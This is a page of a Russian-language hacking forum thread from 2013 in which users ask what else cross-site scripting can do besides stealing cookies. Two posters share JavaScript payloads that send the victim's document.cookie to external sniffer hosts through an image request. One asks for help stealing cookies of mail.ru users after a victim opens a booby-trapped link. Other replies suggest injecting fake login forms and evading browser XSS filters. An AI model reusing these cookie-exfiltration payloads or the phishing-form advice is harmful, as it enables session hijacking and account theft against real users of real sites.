ANTICHAT - Что можно сделать с XSS кроме как украсть cookie?

Страница 1 из 2

Показывать 40 сообщений этой темы на одной странице

ANTICHAT (https://forum.antichat.xyz/index.php)

- Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)

- - Что можно сделать с XSS кроме как украсть cookie? (https://forum.antichat.xyz/showthread.php?t=8066021)

panfilov91

01.10.2013 01:00

Есть пассивная XSS, работает только с этим кодом:

code:

img = new Image(); img.src = "http://httpz.ru/n4zjm6erzao.gif?"+document.cookie;

За кражу cookie отвечает +document.cookie;

А что можно еще сделать с XSS?
Можно ли загнать на сервер какого нибудь червя?

noizZzefan

02.10.2013 01:00

С помощью XSS ? Червя ?
Мсье, зубочисткой дверь взломайте.
Нет, если бы она была активной, можно было бы что-то интересное провернуть, но пассивка поможет только куки украсть.

panfilov91

02.10.2013 01:00

Цитата:

Сообщение от noizZzefan

С помощью XSS ? Червя ?
Мсье, зубочисткой дверь взломайте.
Нет, если бы она была активной, можно было бы что-то интересное провернуть, но пассивка поможет только куки украсть.

Не уходите в оффлай!
Есть вероятность что это активка!
Как нарыть что-то интересное?

the_Ghost

02.10.2013 01:00

у меня есть активка на одном сайте. что с ёё помощью ещё можно сделать? хороший вопрос.

Nick Hander

02.10.2013 01:00

В принципе и с активкой, и с пассивкой можно сделать все, что позволяет javascript, вплодь до полной замены и перерисовки страницы, можно с помощью нее разместить фейковую форму со своим обработчиком прямо на странице целевого сайта. Конечно, она не будет изначально хранится коде на сервере, а будет генерироваться динамически скриптом, который ты активируешь через активку/пассивку, роли это не меняет. Главное правильно использовать под свои нужды XSS и все будет в твоих руках. Кража куков лишь 1% от возможностей XSS.

noizZzefan

02.10.2013 01:00

Так то оно конечно так, но от активки больше пользы будет.
На пассивку могут попасть люди только у которых есть ядовитая ссылка, а активку видят все люди, которые зашли на страницу с кодом.

rox@hak

02.10.2013 01:00

Цитата:

Сообщение от noizZzefan

Так то оно конечно так, но от активки больше пользы будет.
На пассивку могут попасть люди только у которых есть ядовитая ссылка, а активку видят все люди, которые зашли на страницу с кодом.

стоит дополнить, что активка не требует обходов анти-xss фильтров хрома и ИЕ

panfilov91

02.10.2013 01:00

code:

Кража куков лишь 1% от возможностей XSS.

Так что же можно еще сделать? и как?

mrfed

20.11.2013 01:00

У меня есть свой хост. XSS выполняется. Не могу понять как украсть куки после авторизации на mail.ru, открытии письма и перехода по ссылке с XSS. Лог в сниффер приходит, но куков там нет. Что я делю не так? Вот код, который выполняется на хосте:

img = new Image(); img.src = "http://httpz.org/nhong1skzss.gif?"+document.cookie;
var URL = "http://images.cards.mail.ru/11bolprivet.jpg"
var speed = 3000;
function reload() {
document.location = URL
}
setTimeout("reload()", speed);

ZoRKeG

20.11.2013 01:00

mrfed, лол, а на твоем хосте есть куки от мэил.ру? -правильно, нету! Тебе нужно, чтобы скрипт выполнялся на сайте мэил.ру

Время: 17:06

Страница 1 из 2

Показывать 40 сообщений этой темы на одной странице